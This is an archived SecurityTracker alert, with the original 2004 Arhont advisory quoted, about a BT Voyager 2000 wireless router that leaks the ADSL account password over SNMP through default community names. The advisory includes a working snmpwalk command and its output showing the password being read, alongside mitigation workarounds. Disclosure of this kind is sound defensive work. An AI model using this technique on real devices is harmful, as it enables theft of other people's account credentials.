SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Device (Router/Bridge/Hub)  >  BT Voyager 2000 Wireless ADSL Router Vendors:  BT
BT Voyager 2000 Wireless ADSL Router Discloses Passwords Via SNMP
SecurityTracker Alert ID:  1010563
SecurityTracker URL:  http://securitytracker.com/id?1010563
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 22 2004
Impact:  Disclosure of authentication information
Exploit Included:  Yes  
Advisory:  Arhont Ltd.
Description:  A vulnerability was reported in the BT Voyager 2000 Wireless ADSL Router. A remote user can obtain the ADSL account password.

Konstantin Gavrilenko of Arhont Ltd. reported that a remote user on the wireless-side interface can send SNMP packets using the default public or private community name to obtain the account password.

The vendor was reportedly notified on June 10, 2004.
Impact:  A remote user on the wireless interface can obtain the ADSL account password.
Solution:  No solution was available at the time of this entry.

The author of the report has provided the following workarounds [quoted]:

- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support
Vendor URL:  www.bt.com/ (Links to External Site)
Cause:  Access control error
Reported By:  "Konstantin V. Gavrilenko" <mlists@arhont.com>
Message History:   None.

 Source Message Contents
Date:  Tue, 22 Jun 2004 07:47:21 +0100
From:  "Konstantin V. Gavrilenko" <mlists@arhont.com>
Subject:  [Full-Disclosure] Wireless Modem (BT Voyager 2000 Wireless ADSL Router cleartext password)

 

Arhont Ltd. - Information Security

Arhont Advisory by:	Konstantin Gavrilenko (http://www.arhont.com)
Advisory:               cleartext account password obtainable using SNMP
Class:			design/configuration bug
Test platform:		BT Voyager 2000 Wireless ADSL Router
Vendor Contact Date:    10/06/2004
PD* release date:	22/06/2004


DETAILS:

It is possible to obtain the ADSL account password from the wireless
side of the mentioned router. Provided the attacker can associate to the
router, he/she can grab SNMP strings from the router using default
public/private community name.

Furthermore, the information provided with public and private community
name are identical, differing only in that with private you can
obviously change the SNMP strings.



e.g.
root@abyrvalg:~# snmpwalk -v 1 -c public 192.168.1.1
SNMPv2-MIB::sysDescr.0 = STRING: BT Voyager 2000 Wireless ADSL Router
SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.2535.111.6
SNMPv2-MIB::sysUpTime.0 = Timeticks: (260430184) 30 days, 1:02:01.84
[snip]
SNMPv2-SMI::transmission.23.2.3.1.5.5.1 = STRING:
"name.surname@btbroadband.com"
SNMPv2-SMI::transmission.23.2.3.1.5.6.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.7.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.8.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.9.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.10.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.11.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.5.12.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.1 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.2 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.3 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.4 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.5 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.6 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.7 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.0.8 = ""
SNMPv2-SMI::transmission.23.2.3.1.6.5.1 = STRING: "password"
[snip]



Risk Factor: High/Medium

Workarounds:
- Disallow anonymous access to the wireless router
- Change default SNMP community names
- Disable SNMP support



*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer 7 days before
releasing them to the public domains (such as CERT, BUGTRAQ, OSVDB).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team.




-- 
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
	http://www.wi-foo.com
e-mail: k.gavrilenko@arhont.com

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0x4F3608F7
PGP: Server - keyserver.pgp.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2004, SecurityGlobal.net LLC